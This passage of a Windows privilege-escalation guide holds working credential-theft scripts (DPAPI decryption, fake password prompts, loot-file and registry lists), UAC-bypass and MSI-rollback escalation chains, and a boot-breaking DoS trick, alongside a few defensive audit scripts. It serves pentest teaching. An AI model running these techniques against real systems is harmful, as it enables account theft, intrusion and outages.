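A passwordFormat of SHA1 or MD5 means the forms credentials are unsalted hashes rather than clear-text, which still crack quickly offline.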
OpenVPN credentials
Add-Type -AssemblyName System.Security
$keys = Get-ChildItem "HKCU:\Software\OpenVPN-GUI\configs"
$items = $keys | ForEach-Object {Get-ItemProperty $_.PsPath}
foreach ($item in $items)
{
$encryptedbytes=$item.'auth-data'
$entropy=$item.'entropy'
$entropy=$entropy[0..(($entropy.Length)-2)]
$decryptedbytes = [System.Security.Cryptography.ProtectedData]::Unprotect(
$encryptedBytes,
$entropy,
[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
Write-Host ([System.Text.Encoding]::Unicode.GetString($decryptedbytes))
}
Logs
# IIS
C:\inetpub\logs\LogFiles\*
#Apache
Get-Childitem -Path C:\ -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue
Ask for credentials
You can always ask the user to enter their credentials, or even the credentials of a different user if you think they might know them (note that asking the client directly for credentials is really risky):
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+'anotherusername',[Environment]::UserDomainName); $cred.getnetworkcredential().password
#Get plaintext
$cred.GetNetworkCredential() | fl
Possible filenames containing credentials
Known files that at some point contained passwords in clear-text or Base64
$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history
vnc.ini, ultravnc.ini, *vnc*
web.config
php.ini httpd.conf httpd-xampp.conf my.ini my.cnf (XAMPP, Apache, PHP)
SiteList.xml #McAfee
ConsoleHost_history.txt #PS-History
*.gpg
*.pgp
*config*.php
elasticsearch.y*ml
kibana.y*ml
*.p12
*.der
*.csr
*.cer
known_hosts
id_rsa
id_dsa
*.ovpn
anaconda-ks.cfg
hostapd.conf
rsyncd.conf
cesi.conf
supervisord.conf
tomcat-users.xml
*.kdbx
KeePass.config
Ntds.dit
SAM
SYSTEM
FreeSSHDservice.ini
access.log
error.log
server.xml
ConsoleHost_history.txt
setupinfo
setupinfo.bak
key3.db #Firefox
key4.db #Firefox
places.sqlite #Firefox
"Login Data" #Chrome
Cookies #Chrome
Bookmarks #Chrome
History #Chrome
TypedURLsTime #IE
TypedURLs #IE
%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
cd C:\
dir /s/b /A:-D RDCMan.settings == *.rdg == *_history* == httpd.conf == .htpasswd == .gitconfig == .git-credentials == Dockerfile == docker-compose.yml == access_tokens.db == accessTokens.json == azureProfile.json == appcmd.exe == scclient.exe == *.gpg$ == *.pgp$ == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12$ == *.cer$ == known_hosts == *id_rsa* == *id_dsa* == *.ovpn == tomcat-users.xml == web.config == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == security == software == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == php.ini == https.conf == https-xampp.conf == my.ini == my.cnf == access.log == error.log == server.xml == ConsoleHost_history.txt == pagefile.sys == NetSetup.log == iis6.log == AppEvent.Evt == SecEvent.Evt == default.sav == security.sav == software.sav == system.sav == ntuser.dat == index.dat == bash.exe == wsl.exe 2>nul | findstr /v ".dll"
Get-Childitem -Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}
Credentials in the RecycleBin
You should also check the Recycle Bin for credentials inside it
To recover passwords saved by several programs you can use: http://www.nirsoft.net/password_recovery_tools.html
Inside the registry
Other possible registry keys with credentials
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
reg query "HKCU\Software\TightVNC\Server"
reg query "HKCU\Software\OpenSSH\Agent\Keys"
Extract openssh keys from registry.
Browser History
You should check the DBs where passwords from Chrome or Firefox are stored.
Also check the history, bookmarks and favourites of the browsers, as some passwords may be stored there.
Tools to extract passwords from browsers:
- Mimikatz: dpapi::chrome
- SharpWeb
- SharpChromium
- SharpDPAPI
COM DLL Overwriting
Component Object Model (COM) is a technology built into the Windows operating system that allows intercommunication between software components written in different languages. Each COM component is identified via a class ID (CLSID) and each component exposes functionality via one or more interfaces, identified via interface IDs (IIDs).
COM classes and interfaces are defined in the registry under HKEY_CLASSES_ROOT\CLSID and HKEY_CLASSES_ROOT\Interface respectively. This view is created by merging HKEY_LOCAL_MACHINE\Software\Classes + HKEY_CURRENT_USER\Software\Classes = HKEY_CLASSES_ROOT.
Inside the CLSIDs of this registry you will find the subkey InProcServer32, whose default value points to a DLL, and a value called ThreadingModel that can be Apartment (Single-Threaded), Free (Multi-Threaded), Both (Single or Multi) or Neutral (Thread Neutral).
Basically, if you can overwrite any of the DLLs that are going to be executed, you could escalate privileges if that DLL is going to be loaded by a process running as a different (more privileged) user.
To learn how attackers use COM Hijacking as a persistence mechanism, check:
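Finding the overwritable DLLs by hand across thousands of CLSIDs is impractical. The script below is an added example, not code from the original page: it walks every InProcServer32 registration in HKLM and HKCU, expands environment variables in the path, and reports DLLs that are missing or that the current user can open for writing. Writability of an existing file is tested by opening it with FileAccess.Write (which does not truncate); for a missing DLL the parent directory's DACL is inspected, which is a heuristic rather than an effective-access computation. Whether a more privileged process actually instantiates a given CLSID still has to be confirmed separately (for example with Process Monitor).

```powershell
# Added example, not code from the original page: walk every InProcServer32 registration
# and report DLLs that are missing or that the current user can open for writing. Writability
# of an existing DLL is tested by opening it with FileAccess.Write (no truncation); for a
# missing DLL the parent directory's DACL is checked, which is a heuristic rather than an
# effective-access computation. Whether a more privileged process actually loads a given
# CLSID still has to be confirmed (e.g. with Process Monitor).
function Test-FileWritable {
    param([string]$Path)
    try {
        $fs = [IO.File]::Open($Path, [IO.FileMode]::Open, [IO.FileAccess]::Write, [IO.FileShare]::ReadWrite)
        $fs.Dispose()
        return $true
    } catch { return $false }
}

function Test-DirectoryLooksWritable {
    param([string]$Path)
    $broad = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', "$env:USERDOMAIN\$env:USERNAME")
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($broad -notcontains $ace.IdentityReference.Value) { continue }
        if ("$($ace.FileSystemRights)" -match 'Write|Modify|FullControl') { return $true }
    }
    return $false
}

function Get-ComInprocHijackCandidate {
    foreach ($hive in @('HKLM:\SOFTWARE\Classes\CLSID', 'HKCU:\SOFTWARE\Classes\CLSID')) {
        if (-not (Test-Path $hive)) { continue }
        foreach ($clsid in Get-ChildItem $hive -ErrorAction SilentlyContinue) {
            $inproc = Join-Path $clsid.PSPath 'InProcServer32'
            if (-not (Test-Path $inproc)) { continue }
            $props = Get-ItemProperty -Path $inproc -ErrorAction SilentlyContinue
            $dll = $props.'(default)'
            if (-not $dll) { continue }
            $dll = [Environment]::ExpandEnvironmentVariables($dll).Trim('"')
            $relative = -not [IO.Path]::IsPathRooted($dll)
            # Bare file names follow the DLL search order; System32 is the usual resolution
            if ($relative) { $dll = Join-Path "$env:SystemRoot\System32" $dll }
            $exists = Test-Path -LiteralPath $dll
            $writable = if ($exists) { Test-FileWritable $dll } else { Test-DirectoryLooksWritable (Split-Path $dll -Parent) }
            if ($writable -or -not $exists) {
                [pscustomobject]@{
                    Hive           = $hive.Substring(0, 4)
                    CLSID          = $clsid.PSChildName
                    Dll            = $dll
                    Relative       = $relative
                    Exists         = $exists
                    Writable       = $writable
                    ThreadingModel = $props.ThreadingModel
                }
            }
        }
    }
}

Get-ComInprocHijackCandidate | Format-Table -AutoSize
```

Entries from the HKCU hive are writable by design and are a persistence or user-level hijack vector, not a privilege escalation; the interesting rows are HKLM registrations whose DLL (or, when the DLL is missing, whose directory) is writable by a low-privileged user.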
Generic password search in files and registry
Search for file contents
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*
Search for a file with a certain filename
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini
Search the registry for key names and passwords
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
REG QUERY HKLM /F "password" /t REG_SZ /S /d
REG QUERY HKCU /F "password" /t REG_SZ /S /d
Tools that search for passwords
MSF-Credentials Plugin is an msf plugin I created to automatically execute every metasploit POST module that searches for credentials inside the victim.
WinPEAS automatically searches for all the files containing passwords mentioned in this page.
LaZagne is another great tool for extracting passwords from a system.
The tool SessionGopher searches for sessions, usernames and passwords of several tools that save this data in clear text (PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP)
Import-Module path\to\SessionGopher.ps1;
Invoke-SessionGopher -Thorough
Invoke-SessionGopher -AllDomain -o
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
Leaked Handlers
Imagine that a process running as SYSTEM opens a new process (OpenProcess()) with full access. The same process also creates a new process (CreateProcess()) with low privileges but inheriting all the open handles of the main process.
Then, if you have full access to the low privileged process, you can grab the open handle to the privileged process created with OpenProcess() and inject shellcode.
Read this example for more information about how to detect and exploit this vulnerability.
Read this other post for a more complete explanation on how to test and abuse more open handles of processes and threads inherited with different levels of permissions (not only full access).
Named Pipe Client Impersonation
Pipes are a kernel-mediated communication channel that lets processes exchange data.
Windows provides a feature called Named Pipes, allowing unrelated processes to share data, even across the network. This resembles a client/server architecture, with roles defined as named pipe server and named pipe client.
When a client sends data through a pipe, the server that created the pipe can take on the identity of the client, provided it holds SeImpersonatePrivilege. Identifying a privileged process that communicates via a pipe name you can register first gives you the opportunity to gain higher privileges by adopting that process's identity once it connects to the pipe you set up. Instructions for executing such an attack can be found here and here.
Also the following tool allows you to intercept named pipe communication with a tool like Burp: https://github.com/gabriel-sztejnworcel/pipe-intercept, and this tool allows you to list and inspect all the pipes to find privescs: https://github.com/cyberark/PipeViewer
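The mechanics are small enough to see end to end in PowerShell. The following is an added example, not code from the original page: a named-pipe server that waits for a client, reads one byte (impersonation only succeeds once the client has written something), impersonates the client with NamedPipeServerStream.RunAsClient and reports whose token it obtained. The demo client connects from the same account, so it will report your own name; in a real attack the connecting process is a privileged one that was coaxed into opening your pipe name. The pipe name is an assumption chosen for the demo.

```powershell
# Added example, not code from the original page: a named-pipe server that impersonates the
# connecting client and reports whose token it obtained. Run the server first (here as a
# background job), then make something connect to it; the demo client below connects from
# the current session, so it reports your own account. The pipe name is an assumption.
$PipeName = 'demo_pipe_9f3a'

function Start-ImpersonatingPipeServer {
    param([string]$Name, [int]$TimeoutMs = 60000)
    $server = New-Object System.IO.Pipes.NamedPipeServerStream(
        $Name, [IO.Pipes.PipeDirection]::InOut, 1,
        [IO.Pipes.PipeTransmissionMode]::Byte, [IO.Pipes.PipeOptions]::Asynchronous)
    try {
        $ar = $server.BeginWaitForConnection($null, $null)
        if (-not $ar.AsyncWaitHandle.WaitOne($TimeoutMs)) { return 'timeout: no client connected' }
        $server.EndWaitForConnection($ar)
        # ImpersonateNamedPipeClient only succeeds after the client has sent data
        $null = $server.ReadByte()
        $box = @{ Who = $null; Level = $null }
        $server.RunAsClient({
            $id = [Security.Principal.WindowsIdentity]::GetCurrent()
            $box.Who = $id.Name
            $box.Level = $id.ImpersonationLevel
        }.GetNewClosure())
        $server.WriteByte(1)                    # release the client
        return "impersonated $($box.Who) (level: $($box.Level))"
    } finally { $server.Dispose() }
}

function Connect-DemoPipeClient {
    param([string]$Name)
    $client = New-Object System.IO.Pipes.NamedPipeClientStream(
        '.', $Name, [IO.Pipes.PipeDirection]::InOut, [IO.Pipes.PipeOptions]::None,
        [Security.Principal.TokenImpersonationLevel]::Impersonation)
    try {
        $client.Connect(5000)
        $client.WriteByte(1)
        $client.Flush()
        $null = $client.ReadByte()              # wait until the server has impersonated us
    } finally { $client.Dispose() }
}

$job = Start-Job -ScriptBlock ${function:Start-ImpersonatingPipeServer} -ArgumentList $PipeName
Start-Sleep -Seconds 2                          # give the job time to create the pipe
Connect-DemoPipeClient -Name $PipeName
Receive-Job -Job $job -Wait -AutoRemoveJob
```

Two things decide whether this turns into a privilege escalation: the client must connect with an impersonation level of Impersonation or higher (a client that connects with Identification or Anonymous yields a token you cannot run code under), and the server account needs SeImpersonatePrivilege (check with whoami /priv) to use that token with CreateProcessWithTokenW or similar. Service accounts such as IIS application pools and SQL Server typically hold it, which is why this primitive is so common on those hosts.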
Telephony tapsrv remote DWORD write to RCE
The Telephony service (TapiSrv) in server mode exposes \pipe\tapsrv (MS-TRP). A remote authenticated client can abuse the mailslot-based async event path to turn ClientAttach into an arbitrary 4-byte write to any existing file writable by NETWORK SERVICE, then grant itself Telephony admin rights and load an arbitrary DLL as the service. Full chain:
- ClientAttach with pszDomainUser set to an existing writable path: the service opens it via CreateFileW(..., OPEN_EXISTING) and uses that handle for async event writes.
- Every event writes the attacker-controlled InitContext from Initialize to that handle. Register a line app with LRegisterRequestRecipient (Req_Func 61), trigger TRequestMakeCall (Req_Func 121), collect via GetAsyncEvents (Req_Func 0), then unregister/shutdown to repeat the deterministic write.
- Add yourself to [TapiAdministrators] in C:\Windows\TAPI\tsec.ini, reconnect, then call GetUIDllName with an arbitrary DLL path to execute TSPI_providerUIIdentify as NETWORK SERVICE.
More details:
Telephony Tapsrv Arbitrary Dword Write To Rce
Other
File Extensions that could execute stuff in Windows
Check the page https://filesec.io/
Monitoring Command Lines for passwords
When you get a shell as a user, there may be scheduled tasks or other processes being executed that pass credentials on the command line. The script below captures process command lines every second and compares each snapshot with the previous one, outputting any differences.
while($true)
{
    $process = Get-WmiObject Win32_Process | Select-Object CommandLine
    Start-Sleep 1
    $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
    # Compare on the CommandLine property; without -Property the objects would be compared by reference and always differ
    Compare-Object -ReferenceObject $process -DifferenceObject $process2 -Property CommandLine
}
Stealing passwords from processes
From Low-Privileged User to NT AUTHORITY\SYSTEM (CVE-2019-1388) / UAC Bypass
If you have access to the graphical interface (via console or RDP) and UAC is enabled, in some versions of Microsoft Windows it is possible to run a terminal or any other process as "NT AUTHORITY\SYSTEM" from an unprivileged user.
This makes it possible to escalate privileges and bypass UAC at the same time with the same vulnerability. Additionally, there is no need to install anything, and the binary used during the process is signed and issued by Microsoft.
Some of the affected systems are the following:
SERVER
======
Windows 2008r2 7601 ** link OPENED AS SYSTEM **
Windows 2012r2 9600 ** link OPENED AS SYSTEM **
Windows 2016 14393 ** link OPENED AS SYSTEM **
Windows 2019 17763 link NOT opened
WORKSTATION
===========
Windows 7 SP1 7601 ** link OPENED AS SYSTEM **
Windows 8 9200 ** link OPENED AS SYSTEM **
Windows 8.1 9600 ** link OPENED AS SYSTEM **
Windows 10 1511 10240 ** link OPENED AS SYSTEM **
Windows 10 1607 14393 ** link OPENED AS SYSTEM **
Windows 10 1703 15063 link NOT opened
Windows 10 1709 16299 link NOT opened
To exploit this vulnerability, it is necessary to perform the following steps:
1) Right click on the HHUPD.EXE file and run it as Administrator.
2) When the UAC prompt appears, select "Show more details".
3) Click "Show publisher certificate information".
4) If the system is vulnerable, when clicking on the "Issued by" URL link, the default web browser may appear.
5) Wait for the site to load completely and select "Save as" to bring up an explorer.exe window.
6) In the address path of the explorer window, enter cmd.exe, powershell.exe or any other interactive process.
7) You will now have an "NT AUTHORITY\SYSTEM" command prompt.
8) Remember to cancel setup and the UAC prompt to return to your desktop.
From Administrator Medium to High Integrity Level / UAC Bypass
Read this to learn about Integrity Levels:
Then read this to learn about UAC and UAC bypasses:
From Arbitrary Folder Delete/Move/Rename to SYSTEM EoP
The technique is described in this blog post, with exploit code available here.
The attack abuses the Windows Installer's rollback feature to replace legitimate files with malicious ones during an uninstallation. For this the attacker creates a malicious MSI installer that is used to hijack the C:\Config.Msi folder, which the Windows Installer later uses to store rollback files during the uninstallation of other MSI packages; those rollback files are modified to contain the malicious payload.
The summarized technique is the following:
- Stage 1 – Preparing for the Hijack (leave `C:\Config.Msi` empty)
  - Step 1: Install the MSI
    - Create an `.msi` that installs a harmless file (e.g., `dummy.txt`) in a writable folder (`TARGETDIR`).
    - Mark the installer as "UAC Compliant", so a non-admin user can run it.
    - Keep a handle open to the file after install.
  - Step 2: Begin Uninstall
    - Uninstall the same `.msi`.
    - The uninstall process starts moving files to `C:\Config.Msi` and renaming them to `.rbf` files (rollback backups).
    - Poll the open file handle using `GetFinalPathNameByHandle` to detect when the file becomes `C:\Config.Msi\<random>.rbf`.
  - Step 3: Custom Syncing
    - The `.msi` includes a custom uninstall action (`SyncOnRbfWritten`) that:
      - Signals when the `.rbf` has been written.
      - Then waits on another event before continuing the uninstall.
  - Step 4: Block Deletion of `.rbf`
    - When signaled, open the `.rbf` file without `FILE_SHARE_DELETE`; this prevents it from being deleted.
    - Then signal back so the uninstall can finish.
    - Windows Installer fails to delete the `.rbf`, and because it can't delete all contents, `C:\Config.Msi` is not removed.
  - Step 5: Manually Delete `.rbf`
    - You (attacker) delete the `.rbf` file manually.
    - Now `C:\Config.Msi` is empty, ready to be hijacked.
  At this point, trigger the SYSTEM-level arbitrary folder delete vulnerability to delete `C:\Config.Msi`.
- Stage 2 – Replacing Rollback Scripts with Malicious Ones
  - Step 6: Recreate `C:\Config.Msi` with Weak ACLs
    - Recreate the `C:\Config.Msi` folder yourself.
    - Set weak DACLs (e.g., Everyone:F), and keep a handle open with `WRITE_DAC`.
  - Step 7: Run Another Install
    - Install the `.msi` again, with:
      - `TARGETDIR`: a writable location.
      - `ERROROUT`: a variable that triggers a forced failure.
    - This install will be used to trigger rollback again, which reads `.rbs` and `.rbf`.
  - Step 8: Monitor for `.rbs`
    - Use `ReadDirectoryChangesW` to monitor `C:\Config.Msi` until a new `.rbs` appears.
    - Capture its filename.
  - Step 9: Sync Before Rollback
    - The `.msi` contains a custom install action (`SyncBeforeRollback`) that:
      - Signals an event when the `.rbs` is created.
      - Then waits before continuing.
  - Step 10: Reapply Weak ACL
    - After receiving the `.rbs created` event:
      - The Windows Installer reapplies strong ACLs to `C:\Config.Msi`.
      - But since you still have a handle with `WRITE_DAC`, you can reapply weak ACLs again.
    - ACLs are only enforced on handle open, so you can still write to the folder.
  - Step 11: Drop Fake `.rbs` and `.rbf`
    - Overwrite the `.rbs` file with a fake rollback script that tells Windows to restore your `.rbf` file (malicious DLL) into a privileged location (e.g., `C:\Program Files\Common Files\microsoft shared\ink\HID.DLL`).
    - Drop your fake `.rbf` containing a malicious SYSTEM-level payload DLL.
  - Step 12: Trigger the Rollback
    - Signal the sync event so the installer resumes.
    - A type 19 custom action (`ErrorOut`) is configured to intentionally fail the install at a known point.
    - This causes rollback to begin.
  - Step 13: SYSTEM Installs Your DLL
    - Windows Installer reads your malicious `.rbs` and copies your `.rbf` DLL into the target location.
    - You now have your malicious DLL in a SYSTEM-loaded path.
  - Final Step: Execute SYSTEM Code
    - Run a trusted auto-elevated binary (e.g., `osk.exe`) that loads the DLL you hijacked.
    - Boom: your code is executed as SYSTEM.
From Arbitrary File Delete/Move/Rename to SYSTEM EoP
The main MSI rollback technique (the previous one) assumes you can delete an entire folder (e.g., C:\Config.Msi). But what if your vulnerability only allows arbitrary file deletion?
You could exploit NTFS internals: every folder has a hidden alternate data stream called:
C:\SomeFolder::$INDEX_ALLOCATION
This stream stores the folder's index metadata.
So, if you delete the ::$INDEX_ALLOCATION stream of a folder, NTFS removes the whole folder from the file system.
You can do this using standard file deletion APIs such as:
DeleteFileW(L"C:\\Config.Msi::$INDEX_ALLOCATION");
Even though you are calling a file delete API, it deletes the folder itself.
From Folder Contents Delete to SYSTEM EoP
What if your primitive does not let you delete arbitrary files/folders, but does allow deleting the contents of an attacker-controlled folder?
- Step 1: Set up a bait folder and file
  - Create: C:\temp\folder1
  - Inside it: C:\temp\folder1\file1.txt
- Step 2: Place an oplock on file1.txt
  - The oplock pauses execution when a privileged process tries to delete file1.txt.
// pseudo-code
RequestOplock("C:\\temp\\folder1\\file1.txt");
WaitForDeleteToTriggerOplock();
- Step 3: Trigger a SYSTEM process (e.g., SilentCleanup)
  - This process scans folders (e.g., %TEMP%) and tries to delete their contents.
  - When it reaches file1.txt, the oplock triggers and hands control to your callback.
- Step 4: Inside the oplock callback – redirect the delete
  - Option A: Move file1.txt elsewhere
    - This leaves folder1 empty without breaking the oplock.
    - Do not delete file1.txt directly, as that would release the oplock early.
  - Option B: Turn folder1 into a junction:
# folder1 is now a junction to \RPC Control (non-filesystem namespace)
mklink /J C:\temp\folder1 \\?\GLOBALROOT\RPC Control
  - Option C: Create a symlink in \RPC Control:
# Make file1.txt point to a sensitive folder stream
CreateSymlink("\\RPC Control\\file1.txt", "C:\\Config.Msi::$INDEX_ALLOCATION")
This targets the internal NTFS stream that stores the folder's metadata; deleting it deletes the folder.
- Step 5: Release the oplock
  - The SYSTEM process continues and tries to delete file1.txt.
  - But now, because of the junction + symlink, it actually deletes: C:\Config.Msi::$INDEX_ALLOCATION
Result: C:\Config.Msi is deleted by SYSTEM.
From Arbitrary Folder Create to Permanent DoS
Use a primitive that lets you create an arbitrary folder as SYSTEM/admin, even if you cannot write files or set weak permissions.
Create a folder (not a file) with the name of a critical Windows driver, e.g.:
C:\Windows\System32\cng.sys
- This path normally corresponds to the kernel-mode driver cng.sys.
- If you pre-create it as a folder, Windows fails to load the real driver at boot.
- Then, when Windows tries to load cng.sys at boot, it finds the folder, fails to resolve the real driver, and crashes or halts the boot.
- There is no fallback, and no recovery without external intervention (e.g., boot repair or disk access).
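As an added defensive check (not part of the original page), the following PowerShell audits the three file-system conditions the preceding sections rely on: a weak DACL on C:\Config.Msi (Stage 2, Step 6), junctions or symlinks under a user's TEMP folder (Step 4, Options B/C), and a directory squatting on the cng.sys driver path. The paths are the ones named above; scanning only the current user's `$env:TEMP` is an assumption.

```powershell
# Added audit script (not from the original page). Read-only: it reports, never changes anything.
# Checks: 1) C:\Config.Msi DACL, 2) reparse points under $env:TEMP, 3) cng.sys replaced by a folder.
$findings = @()

# 1) C:\Config.Msi must not grant write-class rights to broad principals (the Everyone:F weak ACL above)
$cfg = 'C:\Config.Msi'
if (Test-Path -LiteralPath $cfg) {
    $acl = Get-Acl -LiteralPath $cfg
    foreach ($ace in $acl.Access) {
        $broad  = $ace.IdentityReference.Value -match '^(Everyone|BUILTIN\\Users|NT AUTHORITY\\Authenticated Users)$'
        $writes = $ace.FileSystemRights.ToString() -match 'FullControl|Modify|Write|ChangePermissions|TakeOwnership'
        if ($ace.AccessControlType -eq 'Allow' -and $broad -and $writes) {
            $findings += "Weak ACE on ${cfg}: $($ace.IdentityReference) -> $($ace.FileSystemRights)"
        }
    }
}

# 2) A junction/symlink inside TEMP is the redirect primitive used with the oplock (folder1 -> \RPC Control)
Get-ChildItem -LiteralPath $env:TEMP -Recurse -Force -Attributes ReparsePoint -ErrorAction SilentlyContinue |
    ForEach-Object {
        $findings += "Reparse point in TEMP: $($_.FullName) -> $($_.Target) [$($_.LinkType)]"
    }

# 3) A directory where the kernel-mode driver cng.sys should be is the boot-time DoS condition
$drv = Join-Path $env:SystemRoot 'System32\cng.sys'
if (Test-Path -LiteralPath $drv -PathType Container) {
    $findings += "Directory squatting on driver path: $drv"
}

if ($findings.Count -eq 0) { 'No findings.' } else { $findings }
```

Run it elevated so the Config.Msi DACL can be read; a reparse point in TEMP is not malicious by itself, but one whose target is outside the file system namespace deserves a look.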
From High Integrity to SYSTEM
New service
If you are already running in a High Integrity process, the path to SYSTEM can be as simple as creating and starting a new service:
sc create newservicename binPath= "C:\windows\system32\notepad.exe"
sc start newservicename
Tip
When creating a service binary, make sure it is a valid service or that the binary performs the required actions quickly, because it will be killed after 20s if it is not a valid service.
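Added detection example, not from the original page: the service created with `sc create` above is recorded as event ID 7045 (service installed) in the System log. This PowerShell lists such events from the last 24 hours and flags image paths outside the usual service locations or pointing at a non-service executable such as the notepad.exe used in the page's example; the 24-hour window and the flag patterns are assumptions.

```powershell
# Added example (not from the original page): surface recently installed services via System log event 7045
# and flag entries that look like an arbitrary binary registered as a service.
$since  = (Get-Date).AddHours(-24)   # assumed window
$events = Get-WinEvent -FilterHashtable @{
    LogName = 'System'; ProviderName = 'Service Control Manager'; Id = 7045; StartTime = $since
} -ErrorAction SilentlyContinue

foreach ($e in $events) {
    # 7045 EventData carries ServiceName, ImagePath, ServiceType, StartType and AccountName
    $data = @{}
    foreach ($d in ([xml]$e.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    $img = [string]$data['ImagePath']

    $suspicious = $false
    # Image path outside Windows / Program Files (or their %SystemRoot%/%windir% forms)
    if ($img -notmatch '^"?(C:\\Windows\\|C:\\Program Files|%SystemRoot%|%windir%)') { $suspicious = $true }
    # Well-known non-service executables (pattern list is an assumption)
    if ($img -match 'notepad\.exe|cmd\.exe|powershell\.exe|rundll32\.exe') { $suspicious = $true }

    [pscustomobject]@{
        Time      = $e.TimeCreated
        Service   = $data['ServiceName']
        ImagePath = $img
        Account   = $data['AccountName']
        Flag      = $(if ($suspicious) { 'REVIEW' } else { '' })
    }
}
```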
AlwaysInstallElevated
From a High Integrity process you could try to enable the AlwaysInstallElevated registry entries and install a reverse shell using a .msi wrapper.
More information about the registry keys involved and how to install a .msi package here.
High + SeImpersonate privilege to System
You can find the code here.
From SeDebug + SeImpersonate to Full Token privileges
If you have those token privileges (you will probably find them in an already High Integrity process), you will be able to open almost any process (not protected processes) with the SeDebug privilege, copy the token of the process, and create an arbitrary process with that token.
Using this technique usually means selecting any process running as SYSTEM with all the token privileges (yes, you can find SYSTEM processes without all the token privileges).
You can find an example of code executing the proposed technique here.
Named Pipes
This technique is used by meterpreter to escalate in getsystem. The technique consists of creating a pipe and then creating/abusing a service to write to that pipe. Then, the server that created the pipe using the SeImpersonate privilege will be able to impersonate the token of the pipe client (the service), obtaining SYSTEM privileges.
If you want to learn more about named pipes, read this.
If you want to read an example of how to go from high integrity to System using named pipes, read this.
Dll Hijacking
If you manage to hijack a dll being loaded by a process running as SYSTEM you will be able to execute arbitrary code with those permissions. Therefore Dll Hijacking is also useful for this kind of privilege escalation and, moreover, it is far easier to achieve from a high integrity process, as that process will have write permissions on the folders used to load dlls.
You can learn more about Dll hijacking here.
From Administrator or Network Service to System
- https://github.com/sailay1996/RpcSsImpersonator
- https://decoder.cloud/2020/05/04/from-network-service-to-system/
- https://github.com/decoder-it/NetworkServiceExploit
From LOCAL SERVICE or NETWORK SERVICE to full privs
Read: https://github.com/itm4n/FullPowers
More help
Useful tools
Best tool to look for Windows local privilege escalation vectors: WinPEAS
PS
- PrivescCheck
- PowerSploit-Privesc(PowerUP) – Check for misconfigurations and sensitive files (check here). Detected.
- JAWS – Check for some possible misconfigurations and gather info (check here).
- privesc – Check for misconfigurations
- SessionGopher – Extracts saved session information for PuTTY, WinSCP, SuperPuTTY, FileZilla, and RDP. Use -Thorough locally.
- Invoke-WCMDump – Extracts credentials from Credential Manager. Detected.
- DomainPasswordSpray – Spray gathered passwords across the domain
- Inveigh – Inveigh is a PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool.
- WindowsEnum – Basic privesc Windows enumeration
- Sherlock – Search for known privesc vulnerabilities (DEPRECATED in favour of Watson)
- WINspect – Local audit checks (needs Admin rights)
Exe
- Watson – Search for known privesc vulnerabilities (needs to be compiled using VisualStudio) (precompiled)
- SeatBelt – Enumerates the host looking for misconfigurations (more an information-gathering tool than a privesc tool) (needs to be compiled) (precompiled)
- LaZagne – Extracts credentials from lots of software (precompiled exe on github)
- SharpUP – Port of PowerUp to C#
- Beroot – Check for misconfigurations (precompiled executable on github). Not recommended. It does not work well on Win10.
- Windows-Privesc-Check – Check for possible misconfigurations (exe built from python). Not recommended. It does not work well on Win10.
Bat
- winPEASbat – Tool created based on this post (it does not need accesschk to work properly, but it can use it).
Local
- Windows-Exploit-Suggester – Reads the output of systeminfo and recommends working exploits (local python)
- Windows Exploit Suggester Next Generation – Reads the output of systeminfo and recommends working exploits (local python)
Meterpreter
- multi/recon/local_exploit_suggestor
You have to compile the project using the correct version of .NET (see this). To see the version of .NET installed on the victim host you can run:
C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the code with the version given in "Build Engine version" line